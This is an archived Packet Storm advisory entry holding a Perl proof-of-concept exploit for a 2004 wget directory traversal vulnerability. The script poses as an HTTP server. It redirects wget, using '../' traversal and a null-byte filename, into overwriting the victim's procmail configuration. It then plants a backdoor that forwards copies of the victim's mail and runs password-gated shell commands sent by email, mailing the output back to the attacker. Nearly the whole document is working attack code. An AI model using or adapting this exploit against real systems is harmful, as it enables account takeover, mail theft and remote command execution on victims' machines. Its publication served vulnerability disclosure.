wgettrap.txt

2004-12-30T00:00:00
ID PACKETSTORM:35365
Type packetstorm
Reporter Jan Minar
Modified 2004-12-30T00:00:00

Description

                                        
                                            `#!/usr/bin/perl -W  
# wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability  
#  
# Copyright 2004 Jan Min=C3=A1=C5=99 (jjminar fastmail fm)  
# License: Public Domain - SECU  
#  
# When wget connects to us, we send it a HTTP redirect constructed so that wget  
# wget will connect the second time, it will be attempting to override  
# ~/.procm4ilrc (well, provided that the user running wget has username 'jan'  
# 8-)).  
  
use POSIX qw(strftime);  
  
# This is our scheme/host/port  
$server =3D "http://localhost:31340";  
# Use this + DNS poisoning with wget 1.9 & CVS  
#$server =3D "http://..";  
  
# Wanna know who got infected?=20  
#$log =3D "/dev/pts/1";  
  
# The filename we will try to overwrite on the target system  
$filename =3D "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored.";  
  
############### Payload #########################################  
$email =3D 'your@mailbox';  
$password =3D 'Pmrpuf ner cevzvgvirf';  
$payload =3D <<EOP;  
:0c  
| mail -s 'Wgettrap mail copy' $email  
:0  
* ^X-Wgettrap-Command: shell  
* ^X-Wgettrap-Password: $password  
| /bin/sh -c '/bin/sh | mail -s "Wgettrap shell output" $email'  
EOP  
chomp $payload;  
############### Payload #########################################  
  
# A simple directory traversal, for greater effect  
$trick =3D "/.." . "%2f.." x 40;  
  
open LOG, ">$log" if $log;  
  
while(<STDIN>){  
print LOG $_ if $log;  
if (/\Q$trick$filename\E/) {  
#if (/%2f/) {  
# We see the filename, so this is the second time  
# they're here. Time to feed the sploit.  
$second++;  
} elsif (/^Range: bytes=3D\(33\)-/) {  
# Appending goes like this:  
# (1) Tell'em what you're gonna tell'em  
# (2) Then tell'em just a half  
# (3) Close it  
# (4) Wait  
# (5) They're comin' back, with wget -c  
# (6) Tell'em the sploit  
# (7) Close again  
# (8) Wtf? They're comin' back with wget -c again  
# (9) Tell'em the rest...  
# (10) ... enjoying the backdoor at the same time  
print LOG "File if $1 bytes long\n" if $log;  
} elsif (/^\r?$/) {  
# The HTTP headers are over. Let's do it!  
$date =3D strftime ("%a, %e %b %Y %H:%M:%S %z", localtime);  
if (!$second) {  
# Print the payload  
print <<EOT;  
HTTP/1.1 301 Moved Permanently\r  
Date: $date\r  
Server: wgettrap 1.1\r  
Accept-Ranges: bytes\r  
Location: $server$trick$filename\r  
Content-Length: 43\r  
Connection: close\r  
Content-Type: text/html\r  
\r  
<html><head><title></title></head></html>\r  
EOT  
} else {  
# Print the redirection  
print <<EOT;  
HTTP/1.1 200 OK\r  
Date: $date\r  
Server: wgettrap 1.1\r  
Accept-Ranges: bytes\r  
Content-Length: 25\r  
Connection: close\r  
Content-Type: text/plain\r  
\r  
$payload  
EOT  
}  
exit 0;  
}  
}  
`